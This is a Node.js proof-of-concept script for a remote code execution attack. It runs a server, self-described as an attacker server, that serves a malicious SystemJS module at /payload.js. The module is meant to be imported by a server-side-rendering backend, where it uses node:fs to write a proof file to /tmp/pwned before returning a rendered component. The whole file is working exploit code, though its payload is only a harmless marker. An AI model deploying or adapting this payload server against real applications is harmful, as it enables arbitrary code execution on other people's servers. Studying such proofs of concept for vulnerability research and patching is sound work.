'use strict';

const http = require('http');

const host = '127.0.0.1';
const port = 9001;
const proofDir = '/tmp/pwned';
const proofFile = proofDir + "/systemjs-ssr-rce.txt";

const payload = [
  'System.register([], function (_export) {',
  '  return {',
  '    execute: function () {',
  "      return import('node:fs').then(function (fs) {",
  `        fs.mkdirSync(${JSON.stringify(proofDir)}, { recursive: true });`,
  `        fs.writeFileSync(${JSON.stringify(proofFile)}, "ssr payload executed in backend node process\\n");`,
  "        _export('render', function () {",
  "          return '<h1>Remote component rendered</h1><p>The backend executed the imported module.</p>';",
  '        });',
  '      });',
  '    }',
  '  };',
  '});'
].join('\n');

const server = http.createServer((req, res) => {
  const requestUrl = new URL(req.url, `http://${host}:${port}`);

  if (requestUrl.pathname === '/payload.js') {
    res.writeHead(200, {
      'content-type': 'application/javascript',
      'access-control-allow-origin': '*'
    });
    res.end(payload);
    console.log(`[attacker] served payload to ${req.socket.remoteAddress}`);
    return;
  }

  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end('attacker server: GET /payload.js\n');
});

server.listen(port, host, () => {
  console.log(`[attacker] listening on http://${host}:${port}`);
  console.log(`[attacker] payload URL: http://${host}:${port}/payload.js`);
});